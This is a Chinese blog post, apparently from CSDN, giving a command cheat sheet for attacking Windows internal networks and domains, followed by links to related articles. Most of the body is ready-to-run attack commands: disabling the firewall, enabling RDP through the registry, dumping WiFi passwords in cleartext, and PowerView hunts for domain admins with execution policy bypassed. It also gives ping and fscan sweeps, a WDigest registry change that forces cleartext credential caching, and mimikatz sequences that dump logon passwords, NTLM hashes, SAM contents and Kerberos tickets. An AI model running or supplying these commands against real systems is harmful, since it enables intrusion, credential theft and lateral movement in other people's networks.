【内网渗透第一弹!!!】内网信息收集

已于 2024-12-11 14:53:00 修改
阅读量1.1k 收藏 13
点赞数 41
文章标签: linux docker 服务器
于 2024-12-11 11:12:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2201_75588208/article/details/144395527
版权

1.CS信息收集:

ip与网关

版本信息:

体系结构:

安装的软件:

本机安装服务:

进程:

开机自启:

查看杀软:

wmic /node:localhost/namespace:\\root\securitycenter2 path antivirusproduct get displayname/format:list

查看共享:

关闭防火墙:

netsh firewall set opmode disable

netsh advfirewall firewall add rulename="remotedesktop" protocol=tcp dir=in localport=3389 action=allow

开启3389:

开启3389端口的命令:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭3389端口的命令:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /

查看WiFi账号密码:

for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

查看rdp端口:

REG query HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp /v PortNumber

2.域内信息收集

2.1权限:whoami

查看是否是域

查看是否加入域

查本地用户:net localgroup administrators //查看管理员组

net localgroup users //查看用户组

查看域内用户组列表:net group /domain //domain向域控查询

net group "domain ***" /domain

查询域内计算机:net view/domain:域名

2.2定位域控制器

查看域控的机器名:nlteat /DCLIST:域名

查域控ip:ping 域控.域名.com

//或者 nslookup -type=SRV _ldap._tcp

查看当前时间也可以得到域控名(域控给出时间):net time /domain

用nslookup+域控.域名.com也可以解析到ip

查看域控制器组domain controllers可以查到域控

2.3获取域内用户

查询域内用户:net user /domain

查询域管理用户:net group "domain admins" /domain

2.4定位域管理员

工具PsLoggedom.exe:PsLoggedon.exe -accepteula \\电脑名

PsLoggedon.exe \\用户

工具pvefindaduser:PVEFindADUser.exe -current

工具netview.exe:netview.exe -d

powershell脚本: powershell -exec bypass Import-Module .\powerview.ps1;Get-NetDomain

powershell.exe -exec bypass -command "& {Import-Module .\powerview.ps1;Invoke-Userhunter}"

先导入脚本:Import-Module .\PowerView.ps1

命令:Invoke-Userhunter

3.内网Ip扫描

3.1icmp协议扫描网段

循环ping: for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="

fping.exe ip //管理员权限

3.2arp协议扫描网段

命令:arp -a

3.3NETBIOS协议扫描网段:

找到ip和主机名

命令:nbscan.exe 192.168.111.0/24

3.4fscan工具扫描

fscan.exe -h 192.168.111.0/24

fscan.exe -h 192.168.111.0/24 -o 1.txt //保存到

4.端口扫描

5.密码抓取

5.1mimikatz:要提权到管理员

注意:

当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

抓取明文密码

在windows2012以上的系统不能直接获取明文密码了,当可以搭配procdump+mimikatz获取密码。

mimikatz # log

mimikatz # privilege::debug

mimikatz # sekurlsa::logonpasswords

抓取用户NTLM哈希

sekurlsa::msv

加载dmp文件,并导出其中的明文密码

sekurlsa::minidump lsass.dmp

sekurlsa::logonpasswords full

导出lsass.exe进程中所有的票据

sekurlsa::tickets /export

在线读取SAM文件中Hash

privilege::debug

token::elevate

lsadump::sam

ps:runas /noprofile /user:Administrator cmd

抓取密码原理:读sam文件 读lsass.exe进程(内存)

6.横向移动

6.1rdp连接

查看rdp端口:

reg query "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds" /s

开启3389:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭3389端口的命令:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

域:

只要有两个域控,且域名不一样就是跨域

父域与子域,父域与父域之间要开启信任关系

信任会传递,a信任b,b信任c,a就会信任c

创域为什么需要静态ip并且设为dns

laZyGary
关注
2.9-域环境中定位域管理员
qq_38122566的博客
03-10 629
内网中,通常会部署大多的网络安全系统和设备,例如IDS、IPS、日志审计、安全网关、 反病毒件等。在域网络攻击测试中,获取域内的一个支点后,需要获取域管理员权限,在一个域中,当计算机加入域后,会默认给域管理员组赋予本地系统管理员权限,也就是说,当主机被添加到域中,成为域的成员主机后,系统会自动将域管理员组添加到本地系统管理员组中,因此域管理员组的成员都可以访问本地计算机,且具备安全控制权限。定位域内管理员的常规果道,一是日志,二是会话。日志是指本地机器的管理员日志,会话是指域内每台机器的登录会话。
红队内网攻防渗透内网渗透之Windows内网信息收集内网和域
HACKONE的博客
04-10 669
Telnet协议是tcp/ip协议的一员是Internet远程登陆服务的标准协议和主要方式,快速探测某台主机是否存在某个高危漏洞端口可以使用这个在内网中通常会部署大量的网络安全设备例如IDSIPS日志审计安全网关反病毒等在域网络攻击测试中获取域内一个支点后需要获得域管理员权限在一个域中,当计算机加入域后会默认给域管理员组赋予本地系统管理员权限也就是说当计算机被添加到域中成为域主机系统就会自动将域管理员组添加到本地系统管理员组中因此域管理组的成员均可以访问本地计算机且具备完全的控制权。
windows内网渗透中的cmd命令
2ed
11-07 3315
0x01 基础命令使用: 演示环境: 1 2 win2008R2cn ip: 192.168.3.23 假设为入侵者机器 win2012R2cn ip: 192.168.3.122 假设为目标机器 1 2 3 4 5 6 ...
内网渗透命令总结
净邪的博客
02-25 910
1.域常用操作命令:net group /domain                       //获得所有域用户组列表 net group qq_group /domain              //显示域中qq_group组的成员 net group qq_group /del /domain         //删除域中qq_group组net group qq_group qq /...
内网渗透常用命令大全适合初学者
xiaolaodi666的博客
04-06 5804
内网信息收集常用系统命令,无需工具。
渗透测试之内网渗透(二)
hackzkaq的博客
12-14 223
域是若干台计算机组成的集合,一个电脑也是。域中的电脑是分等级的,分为域控和成员机。
手把手教你如何进行内网渗透
热门推荐
iO快到碗里来
11-19 9万+
0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。 0x01 信息收集 systeminfo 查看系统详细信息,如OS版本、补丁安装情况,可以根据这些信息筛选可利用的漏洞。 net start 查看启动进
内网安全攻防渗透测试实战指南.pptx
07-01
内网安全攻防渗透测试实战指南 ...内网安全攻防渗透测试实战指南旨在帮助安全人员和渗透测试人员更好地理解内网安全攻防的原理和方法,并提供了一些实用的技术和工具来帮助他们更好地进行内网渗透测试和安全攻防。
内网渗透-Windows内网渗透
lza20001103的博客
08-15 2561
内网渗透-Windows内网渗透 文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.
我的第一内网渗透
MSB_WLAQ的博客
11-28 507
我的第一内网渗透 网络拓扑 因为是一次简单的内网渗透,以上靶机均为Windows Server2008,并且没有装任何的补丁,所以全都可以使用ms17_010(永恒之蓝)进行攻击 首先直接使用msf拿到了内网跳板(10.7.233.212)的shell,并且为最高权限, 然后对它进行信息收集,首先查看IP,查看内网的网段是多少 输入命令ipconfig进行查看,然后得知内网跳板的内网IP为(192.168.174.128), 然后为了方便操作,直接在meterpreter界面中输入命令r
Windows 内网渗透之横向渗透
qq_53742230的博客
07-31 3735
内网渗透之横向渗透
渗透实战:内网渗透
kali_Ma的博客
11-22 3万+
前言 本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。 网络拓扑如下: web服务器 先来波端口扫描: 直接发现了内网的ip,这里需要提前说明一点,由于靶场搭建的问题,weblogic只在10.10.20.12这个ip上才能解析,所以需要调整下ip设置,等做完web
渗透实战:内网渗透_内网渗透实例
最新发布
Galaxy_0的博客
11-01 1227
本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。
内网渗透-实战|手把手教你如何进行内网渗透
lza20001103的博客
04-14 7012
内网渗透-实战|手把手教你如何进行内网渗透
Windows内网渗透提权的几个实用命令
ming2008tian的博客
09-26 2168
1.获取操作系统信息识别操作系统名称及版本:C:\Users\thel3l> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" OS Name: Microsoft Windows 10 Pro OS Version: 10.0.14393 N/A Build 14393当然中文系统你得这样:systeminfo | findstr /B /
网络经典命令行(转贴)
雨雪之家
11-29 2391
1.最基本,最常用的,测试物理网络的ping 192.168.10.59 -t ,参数-t是等待用户去中断测试2.查看DNS(对猫用户),还是比较有用处的A.Win98:winipcfgB.Win2000以上:Ipconfig/allC.NSLOOKUP:如河北DNSC:/>nslookupDefault Server: ns.hesjptt.net.cnAddress: 202.99.160.6
2024年最全ConcurrentHashMap是如何保证线程安全的(2)
2401_84265972的博客
05-01 845
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。// 使用同步锁的方式,来保证线程安全,给头节点加锁。
内网信息收集(二)
Y22Lee的博客
05-08 291
内网的核心敏感数据,不仅包括数据库、电子邮件,还包括个人数据及组织的业务数据、技术数据等。可以说,价值较高的数据基本都在内网中重点核心业务机器;内网的核心敏感数据,不仅包括数据库、电子邮件,还包括个人数据及组织的业务数据、技术数据等。可以说,价值较高的数据基本都在内网中!指定目录下的文件中搜集各种账号密码。指定目录下搜集各类敏感文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值